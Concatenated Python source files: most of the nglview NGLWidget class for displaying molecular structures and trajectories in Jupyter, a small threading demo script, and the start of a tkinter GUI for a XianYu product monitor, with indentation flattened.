self._ngl_serialize = True
resource = self._ngl_coordinate_resource
if frame_range is not None:
for t_index, traj in enumerate(self._trajlist):
resource[t_index] = []
for f_index in range(*frame_range):
if f_index < traj.n_frames:
resource[t_index].append(
encode_base64(traj.get_coordinates(f_index)))
else:
resource[t_index].append(
encode_base64(np.empty((0), dtype='f4')))
resource['n_frames'] = len(resource[0])
self._ngl_coordinate_resource = resource
self._ngl_color_dict = color._USER_COLOR_DICT.copy()
def _create_player(self):
player = Play(max=self.max_frame, interval=100)
slider = IntSlider(max=self.max_frame)
self._iplayer = HBox([player, slider])
self.player.widget_player = player
self.player.widget_player_slider = slider
jslink((player, 'value'), (slider, 'value'))
jslink((player, 'value'), (self, 'frame'))
jslink((player, 'max'), (self, 'max_frame'))
jslink((slider, 'max'), (self, 'max_frame'))
def _unset_serialization(self):
self._ngl_serialize = False
self._ngl_coordinate_resource = {}
@property
def parameters(self):
return self._parameters
@parameters.setter
def parameters(self, params):
params = _camelize_dict(params)
self._parameters = params
self._remote_call('setParameters', target='Widget', args=[
params,
])
@property
def camera(self):
return self._camera_str
@camera.setter
def camera(self, value):
"""
Parameters
----------
value : str, {'perspective', 'orthographic'}
"""
self._camera_str = value
# use _remote_call so this function can be called right after
# self is displayed
self._remote_call("setParameters",
target='Stage',
kwargs=dict(cameraType=self._camera_str))
def _set_camera_orientation(self, arr):
self._remote_call('set_camera_orientation',
target='Widget',
args=[
arr,
])
def _request_stage_parameters(self):
self._remote_call('requestUpdateStageParameters', target='Widget')
@validate('gui_style')
def _validate_gui_style(self, proposal):
val = proposal['value']
if val == 'ngl':
if self._widget_theme is None:
from .theme import ThemeManager
self._widget_theme = ThemeManager()
if self._widget_theme._theme is None:
self._widget_theme.light()
return val
@observe("_gui_theme")
def _on_theme_changed(self, change):
# EXPERIMENTAL
from nglview.theme import theme
if change.new == 'dark':
self._widget_theme.dark()
elif change.new == 'light':
self._widget_theme.light()
@observe('picked')
def _on_picked(self, change):
picked = change['new']
if self.player.widget_picked is not None:
self.player.widget_picked.value = json.dumps(picked)
@observe('background')
def _update_background_color(self, change):
color = change['new']
self.stage.set_parameters(background_color=color)
def handle_resize(self):
# self._remote_call("handleResize", target='Stage')
self._remote_call("handleResize")
@observe('n_components')
def _handle_n_components_changed(self, change):
if self.player.widget_repr is not None:
component_slider = widget_utils.get_widget_by_name(
self.player.widget_repr, 'component_slider')
if change['new'] - 1 >= component_slider.min:
component_slider.max = change['new'] - 1
component_dropdown = widget_utils.get_widget_by_name(
self.player.widget_repr, 'component_dropdown')
component_dropdown.options = tuple(self._ngl_component_names)
if change['new'] == 0:
component_dropdown.options = tuple([' '])
component_dropdown.value = ' '
component_slider.max = 0
reprlist_choices = widget_utils.get_widget_by_name(
self.player.widget_repr, 'reprlist_choices')
reprlist_choices.options = tuple([' '])
repr_slider = widget_utils.get_widget_by_name(
self.player.widget_repr, 'repr_slider')
repr_slider.max = 0
repr_name_text = widget_utils.get_widget_by_name(
self.player.widget_repr, 'repr_name_text')
repr_selection = widget_utils.get_widget_by_name(
self.player.widget_repr, 'repr_selection')
repr_name_text.value = ' '
repr_selection.value = ' '
@observe('_ngl_repr_dict')
def _handle_repr_dict_changed(self, change):
if self.player.widget_repr is not None:
repr_slider = widget_utils.get_widget_by_name(
self.player.widget_repr, 'repr_slider')
component_slider = widget_utils.get_widget_by_name(
self.player.widget_repr, 'component_slider')
repr_name_text = widget_utils.get_widget_by_name(
self.player.widget_repr, 'repr_name_text')
repr_selection = widget_utils.get_widget_by_name(
self.player.widget_repr, 'repr_selection')
reprlist_choices = widget_utils.get_widget_by_name(
self.player.widget_repr, 'reprlist_choices')
repr_names = get_repr_names_from_dict(self._ngl_repr_dict,
component_slider.value)
if change['new'] == {0: {}}:
repr_selection.value = ''
else:
options = tuple(
str(i) + '-' + name for (i, name) in enumerate(repr_names))
reprlist_choices.options = options
try:
value = reprlist_choices.options[repr_slider.value]
if isinstance(value, tuple):
# https://github.com/jupyter-widgets/ipywidgets/issues/1512
value = value[0]
reprlist_choices.value = value
except IndexError:
if repr_slider.value == 0:
# works fine with ipywidgets 5.2.2
reprlist_choices.options = tuple([
' ',
])
reprlist_choices.value = ' '
else:
reprlist_choices.value = reprlist_choices.options[
repr_slider.value - 1]
                # e.g.: 0-cartoon
repr_name_text.value = reprlist_choices.value.split(
'-')[-1].strip()
repr_slider.max = len(repr_names) - 1 if len(
repr_names) >= 1 else len(repr_names)
def _update_max_frame(self):
self.max_frame = max(
int(traj.n_frames) for traj in self._trajlist
if hasattr(traj, 'n_frames')) - 1 # index starts from 0
def _wait_until_finished(self, timeout=0.0001):
        # NGL needs to send a 'finished' signal to
        # the backend
self._event.clear()
while True:
# idle to make room for waiting for
# "finished" event sent from JS
time.sleep(timeout)
if self._event.is_set():
# if event is set from another thread
# break while True
break
def _run_on_another_thread(self, func, *args):
        # use `event` to signal
# func(*args)
thread = threading.Thread(
target=func,
args=args,
)
thread.daemon = True
thread.start()
return thread
@observe('loaded')
def on_loaded(self, change):
# trick for firefox on Linux
time.sleep(0.1)
if change['new']:
self._fire_callbacks(self._ngl_displayed_callbacks_before_loaded)
def _fire_callbacks(self, callbacks):
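        # Replay the remote calls queued before the widget was loaded, on a
        # background thread; after each 'loadFile' call, block until the
        # frontend signals completion (see _wait_until_finished and the
        # 'async_message' branch of _ngl_handle_msg).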
def _call(event):
for callback in callbacks:
callback(self)
if callback._method_name == 'loadFile':
self._wait_until_finished()
self._run_on_another_thread(_call, self._event)
def _ipython_display_(self, **kwargs):
super()._ipython_display_(**kwargs)
if self._init_gui:
if self._gui is None:
self._gui = self.player._display()
display(self._gui)
def display(self, gui=False, style='ngl'):
"""
Parameters
----------
gui : bool
If True: turn on GUI
        style : str, {'ngl', 'ipywidgets'}, default 'ngl'
GUI style (with gui=True)
"""
if gui:
if style == 'ipywidgets':
# For the old implementation
# is there anyone using this?
self.gui_style = None # turn off the NGL's GUI
self._gui = self.player._display()
self._gui.layout.align_self = 'stretch'
self._gui.layout.width = '400px'
b = HBox([self, self._gui])
def on(b):
self.handle_resize()
b.on_displayed(on)
return b
elif style == 'ngl':
self.gui_style = 'ngl'
return self
else:
return self
def _set_size(self, w, h):
'''
Parameters
----------
w, h : float or str
Examples
--------
>>> import nglview; view = nglview.demo()
>>> view._set_size(100, 100)
>>> view._set_size('100px', '100px')
>>> view._set_size('50%', '50%')
'''
self._remote_call('setSize', target='Widget', args=[w, h])
def _set_sync_repr(self, other_views):
model_ids = {v._model_id for v in other_views}
self._synced_repr_model_ids = sorted(
set(self._synced_repr_model_ids) | model_ids)
self._remote_call("setSyncRepr",
target="Widget",
args=[self._synced_repr_model_ids])
def _set_unsync_repr(self, other_views):
model_ids = {v._model_id for v in other_views}
self._synced_repr_model_ids = list(set(self._synced_repr_model_ids) - model_ids)
self._remote_call("setSyncRepr",
target="Widget",
args=[self._synced_repr_model_ids])
def _set_sync_camera(self, other_views):
model_ids = {v._model_id for v in other_views}
self._synced_model_ids = sorted(
set(self._synced_model_ids) | model_ids)
self._remote_call("setSyncCamera",
target="Widget",
args=[self._synced_model_ids])
def _set_unsync_camera(self, other_views):
model_ids = {v._model_id for v in other_views}
self._synced_model_ids = list(set(self._synced_model_ids) - model_ids)
self._remote_call("setSyncCamera",
target="Widget",
args=[self._synced_model_ids])
def _set_spin(self, axis, angle):
self._remote_call('setSpin', target='Stage', args=[axis, angle])
def _set_selection(self, selection, component=0, repr_index=0):
self._remote_call("setSelection",
target='Representation',
args=[selection],
kwargs=dict(component_index=component,
repr_index=repr_index))
def color_by(self, color_scheme, component=0):
'''update color for all representations of given component
Notes
-----
Unstable feature
Parameters
----------
color_scheme : str
component : int, default 0
component index
Examples
--------
>>> import nglview
>>> view = nglview.demo()
>>> # component 0
>>> view.color_by('atomindex')
>>> # component 1
>>> view.color_by('atomindex', component=1)
'''
repr_names = get_repr_names_from_dict(self._ngl_repr_dict, component)
for index, _ in enumerate(repr_names):
self.update_representation(component=component,
repr_index=index,
color_scheme=color_scheme)
@property
def representations(self):
return self._representations
@representations.setter
def representations(self, reps):
if isinstance(reps, dict):
self._remote_call("_set_representation_from_repr_dict",
args=[reps])
else:
self._representations = reps[:]
for index in range(len(self._ngl_component_ids)):
self.set_representations(reps)
def update_representation(self, component=0, repr_index=0, **parameters):
"""
Parameters
----------
component : int, default 0
component index
repr_index : int, default 0
representation index for given component
parameters : dict
"""
parameters = _camelize_dict(parameters)
kwargs = dict(component_index=component, repr_index=repr_index)
kwargs.update(parameters)
self._remote_call('setParameters',
target='Representation',
kwargs=kwargs)
self._update_repr_dict()
def _update_repr_dict(self):
""" Send a request to fronend to send representation parameters
back.
# TODO: sync or async
"""
self._remote_call('request_repr_dict', target='Widget')
def set_representations(self, representations, component=0):
"""
Parameters
----------
representations : list of dict
"""
self.clear_representations(component=component)
for params in representations:
assert isinstance(params, dict), 'params must be a dict'
kwargs = params['params']
kwargs.update({'component_index': component})
self._remote_call('addRepresentation',
target='compList',
args=[
params['type'],
],
kwargs=kwargs)
def _remove_representation(self, component=0, repr_index=0):
self._remote_call('removeRepresentation',
target='Widget',
args=[component, repr_index])
def _remove_representations_by_name(self, repr_name, component=0):
self._remote_call('removeRepresentationsByName',
target='Widget',
args=[repr_name, component])
def _update_representations_by_name(self, repr_name, component=0,
**kwargs):
kwargs = _camelize_dict(kwargs)
self._remote_call('updateRepresentationsByName',
target='Widget',
args=[repr_name, component],
kwargs=kwargs)
def _display_repr(self, component=0, repr_index=0, name=None):
c = 'c' + str(component)
r = str(repr_index)
try:
name = self._ngl_repr_dict[c][r]['type']
except KeyError:
name = ''
return RepresentationControl(self, component, repr_index, name=name)
def _set_coordinates(self, index, movie_making=False, render_params=None):
        # FIXME: using movie_making here seems awkward.
'''update coordinates for all trajectories at index-th frame
'''
render_params = render_params or {}
if self._trajlist:
coordinates_dict = {}
for trajectory in self._trajlist:
traj_index = self._ngl_component_ids.index(trajectory.id)
try:
if trajectory.shown:
if self.player.interpolate:
t = self.player.iparams.get('t', 0.5)
step = self.player.iparams.get('step', 1)
coordinates_dict[traj_index] = interpolate.linear(
index, t=t, traj=trajectory, step=step)
else:
coordinates_dict[
traj_index] = trajectory.get_coordinates(index)
else:
coordinates_dict[traj_index] = np.empty((0),
dtype='f4')
except (IndexError, ValueError):
coordinates_dict[traj_index] = np.empty((0), dtype='f4')
self.set_coordinates(coordinates_dict,
render_params=render_params,
movie_making=movie_making)
else:
print("no trajectory available")
def set_coordinates(self, arr_dict, movie_making=False,
render_params=None):
# type: (Dict[int, np.ndarray]) -> None
"""Used for update coordinates of a given trajectory
>>> # arr: numpy array, ndim=2
>>> # update coordinates of 1st trajectory
>>> view.set_coordinates({0: arr})# doctest: +SKIP
"""
render_params = render_params or {}
self._coordinates_dict = arr_dict
buffers = []
coordinates_meta = dict()
for index, arr in self._coordinates_dict.items():
buffers.append(arr.astype('f4').tobytes())
coordinates_meta[index] = index
msg = {
'type': 'binary_single',
'data': coordinates_meta,
}
if movie_making:
msg['movie_making'] = movie_making
msg['render_params'] = render_params
self.send(
msg,
buffers=buffers)
@observe('frame')
def _on_frame_changed(self, change):
"""set and send coordinates at current frame
"""
self._set_coordinates(self.frame)
def clear(self, *args, **kwargs):
'''shortcut of `clear_representations`
'''
self.clear_representations(*args, **kwargs)
def clear_representations(self, component=0):
'''clear all representations for given component
Parameters
----------
component : int, default 0 (first model)
You need to keep track how many components you added.
'''
self._remote_call("removeAllRepresentations",
target='compList',
kwargs={'component_index': component})
@_update_url
def _add_shape(self, shapes, name='shape'):
"""add shape objects
TODO: update doc, caseless shape keyword
Parameters
----------
shapes : list of tuple
name : str, default 'shape'
name of given shape
Notes
-----
Supported shape: 'mesh', 'sphere', 'ellipsoid', 'cylinder', 'cone', 'arrow'.
See also
--------
{ngl_url}
Examples
--------
>>> import nglview
>>> view = nglview.demo()
>>> sphere = ('sphere', [0, 0, 9], [1, 0, 0], 1.5)
>>> arrow = ('arrow', [1, 2, 7 ], [30, 3, 3], [1, 0, 1], 1.0)
>>> view._add_shape([sphere, arrow], name='my_shape')
"""
self._remote_call('addShape', target='Widget', args=[name, shapes], fire_embed=True)
@_update_url
def add_representation(self, repr_type, selection='all', **kwargs):
'''Add structure representation (cartoon, licorice, ...) for given atom selection.
Parameters
----------
repr_type : str
type of representation. Please see {ngl_url} for further info.
selection : str or 1D array (atom indices) or any iterator that returns integer, default 'all'
atom selection
**kwargs: additional arguments for representation
Example
-------
>>> import nglview as nv
>>> import pytraj
>>> t = pytraj.datafiles.load_tz2()
>>> w = nv.show_pytraj(t)
>>> w.add_representation('cartoon', selection='protein', color='blue')
>>> w.add_representation('licorice', selection=[3, 8, 9, 11], color='red')
>>> w # doctest: +SKIP
Notes
-----
User can also use shortcut
>>> selection = 'protein'
>>> w.add_cartoon(selection) # w.add_representation('cartoon', selection)
'''
if repr_type == 'surface':
if 'useWorker' not in kwargs:
kwargs['useWorker'] = False
# avoid space sensitivity
repr_type = repr_type.strip()
# overwrite selection
selection = seq_to_string(selection).strip()
# make copy
kwargs2 = _camelize_dict(kwargs)
if 'component' in kwargs2:
component = kwargs2.pop('component')
else:
component = 0
for k, v in kwargs2.items():
try:
kwargs2[k] = v.strip()
except AttributeError:
# e.g.: opacity=0.4
kwargs2[k] = v
d = {'params': {'sele': selection}}
d['type'] = repr_type
d['params'].update(kwargs2)
params = d['params']
params.update({'component_index': component})
self._remote_call('addRepresentation',
target='compList',
args=[
d['type'],
],
kwargs=params)
@_deprecated("DEPRECATED: Please use 'center' method")
def center_view(self, *args, **kwargs):
"""alias of `center_view`
"""
self.center(*args, **kwargs)
def center(self, selection='*', duration=0, component=0, **kwargs):
"""center view for given atom selection
Examples
--------
        view.center(selection='1-4')
"""
self._remote_call('autoView',
target='compList',
args=[selection, duration],
kwargs={'component_index': component},
**kwargs)
@observe('_image_data')
def _on_render_image(self, change):
'''update image data to widget_image
Notes
-----
method name might be changed
'''
self._widget_image._b64value = change['new']
def render_image(self,
frame=None,
factor=4,
antialias=True,
trim=False,
transparent=False):
"""render and get image as ipywidgets.widget_image.Image
Parameters
----------
frame : int or None, default None
if None, use current frame
if specified, use this number.
factor : int, default 4
quality of the image, higher is better
antialias : bool, default True
trim : bool, default False
transparent : bool, default False
Examples
--------
        # tell NGL to render and send image data to the notebook.
view.render_image()
# make sure to call `get_image` method
view.get_image()
Notes
-----
You need to call `render_image` and `get_image` in different notebook's Cells
"""
if frame is not None:
self.frame = frame
params = dict(factor=factor,
antialias=antialias,
trim=trim,
transparent=transparent)
iw = Image()
iw.width = '99%' # avoid ugly scroll bar on notebook.
self._remote_call('_exportImage',
target='Widget',
args=[iw.model_id],
kwargs=params)
        # iw.value will be updated later, after the frontend sends the image data back.
return iw
def download_image(self,
filename='screenshot.png',
factor=4,
antialias=True,
trim=False,
transparent=False):
"""render and download scene at current frame
Parameters
----------
filename : str, default 'screenshot.png'
factor : int, default 4
quality of the image, higher is better
antialias : bool, default True
trim : bool, default False
transparent : bool, default False
"""
params = dict(factor=factor,
antialias=antialias,
trim=trim,
transparent=transparent)
self._remote_call('_downloadImage',
target='Widget',
args=[
filename,
],
kwargs=params)
def _ngl_handle_msg(self, widget, msg, buffers):
"""store message sent from Javascript.
How? use view.on_msg(get_msg)
Notes: message format should be {'type': type, 'data': data}
_ngl_handle_msg will call appropriate function to handle message "type"
"""
self._ngl_msg = msg
msg_type = self._ngl_msg.get('type')
if msg_type == 'request_frame':
frame = self.frame + self.player.step
if frame > self.max_frame:
frame = 0
elif frame < 0:
frame = self.max_frame
self.frame = frame
elif msg_type == 'updateIDs':
self._ngl_view_id = msg['data']
elif msg_type == 'removeComponent':
cindex = int(msg['data'])
self._ngl_component_ids.pop(cindex)
elif msg_type == 'repr_parameters':
data_dict = self._ngl_msg.get('data')
name = data_dict.pop('name') + '\n'
selection = data_dict.get('sele', '') + '\n'
# json change True to true
data_dict_json = json.dumps(data_dict).replace(
'true', 'True').replace('false', 'False')
data_dict_json = data_dict_json.replace('null', '"null"')
if self.player.widget_repr is not None:
# TODO: refactor
repr_name_text = widget_utils.get_widget_by_name(
self.player.widget_repr, 'repr_name_text')
repr_selection = widget_utils.get_widget_by_name(
self.player.widget_repr, 'repr_selection')
repr_name_text.value = name
repr_selection.value = selection
elif msg_type == 'request_loaded':
if not self.loaded:
# trick to trigger observe loaded
# so two viewers can have the same representations
self.loaded = False
self.loaded = msg.get('data')
elif msg_type == 'request_repr_dict':
# update _repr_dict will trigger other things
# see _handle_repr_dict_changed
self._ngl_repr_dict = self._ngl_msg.get('data')
elif msg_type == 'stage_parameters':
self._ngl_full_stage_parameters = msg.get('data')
elif msg_type == 'async_message':
if msg.get('data') == 'ok':
self._event.set()
elif msg_type == 'image_data':
self._image_data = msg.get('data')
Widget.widgets[msg.get('ID')].value = base64.b64decode(
self._image_data)
def _request_repr_parameters(self, component=0, repr_index=0):
if self.n_components > 0:
self._remote_call('requestReprParameters',
target='Widget',
args=[component, repr_index])
def add_structure(self, structure, **kwargs):
'''add structure to view
Parameters
----------
structure : nglview.Structure object
Examples
--------
>>> view.add_trajectory(traj0) # doctest: +SKIP
... view.add_trajectory(traj1)
... # then add Structure
... view.add_structure(s)
See Also
--------
nglview.NGLWidget.add_component
'''
if not isinstance(structure, Structure):
raise ValueError(f'{structure} is not an instance of Structure')
self._load_data(structure, **kwargs)
self._ngl_component_ids.append(structure.id)
if self.n_components > 1:
self.center_view(component=len(self._ngl_component_ids) - 1)
self._update_component_auto_completion()
return self[-1]
def add_trajectory(self, trajectory, **kwargs):
'''add new trajectory to `view`
Parameters
----------
trajectory: nglview.Trajectory or its derived class or
a supported object, eg pytraj.Trajectory-like,
mdtraj.Trajectory, MDAnalysis objects, etc
See Also
--------
nglview.NGLWidget.add_component
Examples
--------
>>> import nglview as nv, pytraj as pt
>>> traj = pt.load(nv.datafiles.TRR, nv.datafiles.PDB)
>>> view = nv.show_pytraj(traj)
>>> # show view first
>>> view # doctest: +SKIP
>>> # add new Trajectory
>>> traj2 = pt.datafiles.load_tz2()
>>> c = view.add_trajectory(traj2)
'''
backends = BACKENDS
package_name = trajectory.__module__.split('.')[0]
if package_name in backends:
trajectory = backends[package_name](trajectory)
else:
trajectory = trajectory
self._load_data(trajectory, **kwargs)
setattr(trajectory, 'shown', True)
self._trajlist.append(trajectory)
self._update_max_frame()
self._ngl_component_ids.append(trajectory.id)
self._update_component_auto_completion()
return self[-1]
def add_pdbid(self, pdbid, **kwargs):
'''add new Structure view by fetching pdb id from rcsb
Examples
--------
>>> import nglview
>>> view = nglview.NGLWidget()
>>> c = view.add_pdbid('1tsu')
>>> # which is equal to
>>> # view.add_component('rcsb://1tsu.pdb')
'''
return self.add_component(f'rcsb://{pdbid}.pdb', **kwargs)
def add_component(self, filename, **kwargs):
        '''add component from file/trajectory/structure
Parameters
----------
filename : str or Trajectory or Structure or their derived class or url
**kwargs : additional arguments, optional
Examples
--------
>>> import nglview
>>> view = nglview.NGLWidget()
>>> view # doctest: +SKIP
... filename = 'somefile.ccp4'
... view.add_component(filename)
Notes
-----
        If you want to load a binary file (e.g. density data or mmtf format), it is
        faster to load the file from the current folder or a subfolder.
'''
# if passed a supported object, convert "filename" to nglview.Trajectory
try:
package_name = filename.__module__.split('.')[0]
except (TypeError, AttributeError):
# string filename
pass
else:
if package_name in BACKENDS:
filename = BACKENDS[package_name](filename)
self._load_data(filename, **kwargs)
# assign an ID
self._ngl_component_ids.append(str(uuid.uuid4()))
self._update_component_auto_completion()
return self[-1]
def _load_data(self, obj, **kwargs):
'''
Parameters
----------
obj : nglview.Structure or any object having 'get_structure_string' method or
string buffer (open(fn).read())
'''
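        # Summary of the branches below: objects exposing get_structure_string()
        # are sent as text blobs; everything else goes through FileManager, which
        # passes either a file path or the file content (base64-encoded when
        # binary); URLs are forwarded to NGL unchanged.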
kwargs2 = _camelize_dict(kwargs)
try:
is_url = FileManager(obj).is_url
except NameError:
is_url = False
if 'defaultRepresentation' not in kwargs2:
kwargs2['defaultRepresentation'] = True
if not is_url:
if hasattr(obj, 'get_structure_string'):
blob = obj.get_structure_string()
kwargs2['ext'] = obj.ext
passing_buffer = True
binary = False
else:
fh = FileManager(obj,
ext=kwargs.get('ext'),
compressed=kwargs.get('compressed'))
# assume passing string
blob = fh.read()
passing_buffer = not fh.use_filename
if fh.ext is None and passing_buffer:
raise ValueError('must provide extension')
kwargs2['ext'] = fh.ext
binary = fh.is_binary
use_filename = fh.use_filename
if binary and not use_filename:
# send base64
blob = base64.b64encode(blob).decode('utf8')
blob_type = 'blob' if passing_buffer else 'path'
args = [{'type': blob_type, 'data': blob, 'binary': binary}]
else:
# is_url
blob_type = 'url'
url = obj
args = [{'type': blob_type, 'data': url, 'binary': False}]
name = py_utils.get_name(obj, kwargs2)
self._ngl_component_names.append(name)
self._remote_call("loadFile",
target='Stage',
args=args,
kwargs=kwargs2)
def remove_component(self, c):
"""remove component by its uuid.
If isinstance(c, ComponentViewer), `c` won't be associated with `self`
Parameters
----------
c : Union[int, ComponentViewer]
Examples
--------
>>> c0 = view.add_trajectory(traj0) # doctest: +SKIP
... c1 = view.add_trajectory(traj1)
        ... c2 = view.add_structure(structure)
... # remove last component
... view.remove_component(c2)
... assert c2._view is None
"""
if isinstance(c, ComponentViewer):
component_id = c.id
c._view = None
else:
component_id = c
self._clear_component_auto_completion()
if self._trajlist:
for traj in self._trajlist:
if traj.id == component_id:
self._trajlist.remove(traj)
component_index = self._ngl_component_ids.index(component_id)
self._ngl_component_ids.remove(component_id)
self._ngl_component_names.pop(component_index)
self._remote_call('removeComponent',
target='Stage',
args=[
component_index,
])
self._update_component_auto_completion()
def _dry_run(self, func, *args, **kwargs):
return _dry_run(self, func, *args, **kwargs)
def _get_remote_call_msg(self,
method_name,
target='Widget',
args=None,
kwargs=None,
**other_kwargs):
"""call NGL's methods from Python.
Parameters
----------
method_name : str
target : str, {'Stage', 'Viewer', 'compList', 'StructureComponent'}
args : list
kwargs : dict
if target is 'compList', "component_index" could be passed
to specify which component will call the method.
Examples
--------
view._remote_call('loadFile', args=['1L2Y.pdb'],
target='Stage', kwargs={'defaultRepresentation': True})
# perform autoView for 1st component
# JS code
# component = Stage.compList[1];
# component.autoView('*', 200)
# python
view._remote_call('autoView',
target='component',
args=['*', 200],
kwargs={'component_index': 1})
"""
# NOTE: _camelize_dict here?
args = [] if args is None else args
kwargs = {} if kwargs is None else kwargs
msg = {}
if 'component_index' in kwargs:
msg['component_index'] = kwargs.pop('component_index')
if 'repr_index' in kwargs:
msg['repr_index'] = kwargs.pop('repr_index')
if 'default' in kwargs:
kwargs['defaultRepresentation'] = kwargs.pop('default')
# Color handling
reconstruc_color_scheme = False
if 'color' in kwargs and isinstance(kwargs['color'],
color._ColorScheme):
kwargs['color_label'] = kwargs['color'].data['label']
            # overwrite `color`
kwargs['color'] = kwargs['color'].data['data']
reconstruc_color_scheme = True
if kwargs.get('colorScheme') == 'volume' and kwargs.get('colorVolume'):
assert isinstance(kwargs['colorVolume'], ComponentViewer)
kwargs['colorVolume'] = kwargs['colorVolume']._index
msg['target'] = target
msg['type'] = 'call_method'
msg['methodName'] = method_name
msg['reconstruc_color_scheme'] = reconstruc_color_scheme
msg['args'] = args
msg['kwargs'] = kwargs
if other_kwargs:
msg.update(other_kwargs)
return msg
def _trim_message(self, messages):
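        # Drop matched loadFile/removeComponent pairs from the archived message
        # list so that serializing the widget does not replay components that
        # were later removed; indices are recomputed after every removal because
        # popping shifts the remaining messages.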
messages = messages[:]
load_comps = [
index for index, msg in enumerate(messages)
if msg['methodName'] == 'loadFile'
]
remove_comps = [(index, msg['args'][0])
for index, msg in enumerate(messages)
if msg['methodName'] == 'removeComponent']
remove_comps.reverse()
while remove_comps:
index, cindex = remove_comps.pop()
messages.pop(index)
messages.pop(load_comps[cindex])
load_comps.remove(load_comps[cindex])
load_comps = [
index for index, msg in enumerate(messages)
if msg['methodName'] == 'loadFile'
]
remove_comps = [(index, msg['args'][0])
for index, msg in enumerate(messages)
if msg['methodName'] == 'removeComponent']
remove_comps.reverse()
return messages
def _remote_call(self,
method_name,
target='Widget',
args=None,
kwargs=None,
**other_kwargs):
msg = self._get_remote_call_msg(method_name,
target=target,
args=args,
kwargs=kwargs,
**other_kwargs)
def callback(widget, msg=msg):
widget.send(msg)
callback._method_name = method_name
callback._ngl_msg = msg
if self.loaded:
self._remote_call_thread.q.append(callback)
else:
# send later
# all callbacks will be called right after widget is loaded
self._ngl_displayed_callbacks_before_loaded.append(callback)
if callback._method_name not in _EXCLUDED_CALLBACK_AFTER_FIRING and \
(not other_kwargs.get("fire_once", False)):
archive = self._ngl_msg_archive[:]
archive.append(msg)
self._ngl_msg_archive = self._trim_message(archive)
def _get_traj_by_id(self, itsid):
"""return nglview.Trajectory or its derived class object
"""
for traj in self._trajlist:
if traj.id == itsid:
return traj
return None
def hide(self, indices):
"""set invisibility for given component/struture/trajectory (by their indices)
"""
traj_ids = {traj.id for traj in self._trajlist}
for index in indices:
comp_id = self._ngl_component_ids[index]
if comp_id in traj_ids:
traj = self._get_traj_by_id(comp_id)
traj.shown = False
self._remote_call("setVisibility",
target='compList',
args=[
False,
],
kwargs={'component_index': index})
def show(self, **kwargs):
"""shortcut of `show_only`
"""
self.show_only(**kwargs)
def show_only(self, indices='all', **kwargs):
"""set visibility for given components (by their indices)
Parameters
----------
indices : {'all', array-like}, component index, default 'all'
"""
traj_ids = {traj.id for traj in self._trajlist}
if indices == 'all':
indices_ = set(range(self.n_components))
else:
indices_ = set(indices)
for index, comp_id in enumerate(self._ngl_component_ids):
if comp_id in traj_ids:
traj = self._get_traj_by_id(comp_id)
else:
traj = None
if index in indices_:
args = [
True,
]
if traj is not None:
traj.shown = True
else:
args = [
False,
]
if traj is not None:
traj.shown = False
self._remote_call("setVisibility",
target='compList',
args=args,
kwargs={'component_index': index},
**kwargs)
def _js_console(self):
self.send(dict(type='get', data='any'))
def _get_full_params(self):
self.send(dict(type='get', data='parameters'))
def _display_image(self):
'''for testing
'''
from IPython import display
im_bytes = base64.b64decode(self._image_data)
return display.Image(im_bytes)
def _clear_component_auto_completion(self):
for index, _ in enumerate(self._ngl_component_ids):
name = 'component_' + str(index)
delattr(self, name)
def _js(self, code, **kwargs):
self._execute_js_code(code, **kwargs)
def _execute_js_code(self, code, **kwargs):
self._remote_call('executeCode',
target='Widget',
args=[code],
**kwargs)
def _update_component_auto_completion(self):
trajids = [traj.id for traj in self._trajlist]
for index, cid in enumerate(self._ngl_component_ids):
comp = ComponentViewer(self, index)
name = 'component_' + str(index)
setattr(self, name, comp)
if cid in trajids:
traj_name = 'trajectory_' + str(trajids.index(cid))
setattr(self, traj_name, comp)
def __getitem__(self, index):
"""return ComponentViewer
"""
        positive_index = py_utils.get_positive_index(
            index, len(self._ngl_component_ids))
        return ComponentViewer(self, positive_index)
def __iter__(self):
"""return ComponentViewer
"""
for i, _ in enumerate(self._ngl_component_ids):
yield self[i]
class Fullscreen(DOMWidget):
"""EXPERIMENTAL
"""
_view_name = Unicode("FullscreenView").tag(sync=True)
_view_module = Unicode("nglview-js-widgets").tag(sync=True)
_view_module_version = Unicode(__frontend_version__).tag(sync=True)
_model_name = Unicode("FullscreenModel").tag(sync=True)
_model_module = Unicode("nglview-js-widgets").tag(sync=True)
_model_module_version = Unicode(__frontend_version__).tag(sync=True)
_is_fullscreen = Bool().tag(sync=True)
def __init__(self, target, views):
super().__init__()
self._target = target
self._views = views
def fullscreen(self):
self._js("this.fullscreen('%s')" % self._target.model_id)
def _js(self, code):
msg = {"executeCode": code}
self.send(msg)
@observe('_is_fullscreen')
def _fullscreen_changed(self, change):
if not change.new:
self._target.layout.height = '300px'
self.handle_resize()
def handle_resize(self):
for v in self._views:
v.handle_resize()
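

# --- Illustrative usage sketch (not part of the library) ----------------------
# A minimal, hedged example of driving NGLWidget from a notebook, based on the
# docstrings above. It assumes a live Jupyter frontend (remote calls are only
# queued until the widget reports 'loaded') and network access for the RCSB
# fetch; the function name `_example_usage` is hypothetical.
def _example_usage():
    view = NGLWidget()
    view.add_pdbid('1tsu')  # equivalent to view.add_component('rcsb://1tsu.pdb')
    view.add_representation('cartoon', selection='protein', color='blue')
    view.camera = 'perspective'  # or 'orthographic'
    view.center(selection='protein')
    image = view.render_image(factor=4)  # ipywidgets Image, filled in by the frontend
    return view, image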
|
mtsleepD.py
|
import threading
from time import sleep, ctime
loops = [4, 2]
class ThreadFunc(object):
def __init__(self, func, args, name=''):
print(name)
self.name = name
self.func = func
self.args = args
def __call__(self):
self.func(*self.args)
def loop(nloop, nsec):
    print("start loop", nloop, 'at:', ctime())
    sleep(nsec)
print("loop", nloop, 'done at:', ctime())
def main():
print("starting at:", ctime())
threads = []
nloops = range(len(loops))
for i in nloops:
t = threading.Thread(target=ThreadFunc(loop, (i, loops[i]), loop.__name__))
threads.append(t)
for i in nloops:
threads[i].start()
for i in nloops:
threads[i].join()
print("all DONE at:", ctime())
if __name__ == '__main__':
main()
|
tkXianYu.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
__author__ = 'AJay'
__mtime__ = '2019/4/15 0015'
"""
import re
import time
import threading
from datetime import datetime
import tkinter as tk
import os
from dingding import DingMsg
from db import MongoKeyword, MongoProduct, MongoConfig, MongoTime
from multiprocessing import Process, JoinableQueue
from tkinter import *
from tkinter import scrolledtext
from tkinter import messagebox
from asy import XianYu
from asy import _run
class MainPage(object):
def __init__(self, master):
self.window = master
sw = self.window.winfo_screenwidth()
sh = self.window.winfo_screenheight()
ww = 1400
wh = 650
x = (sw - ww) / 2
y = (sh - wh) / 2
        self.window.geometry('%dx%d+%d+%d' % (ww, wh, x, y))  # size/position of the main window
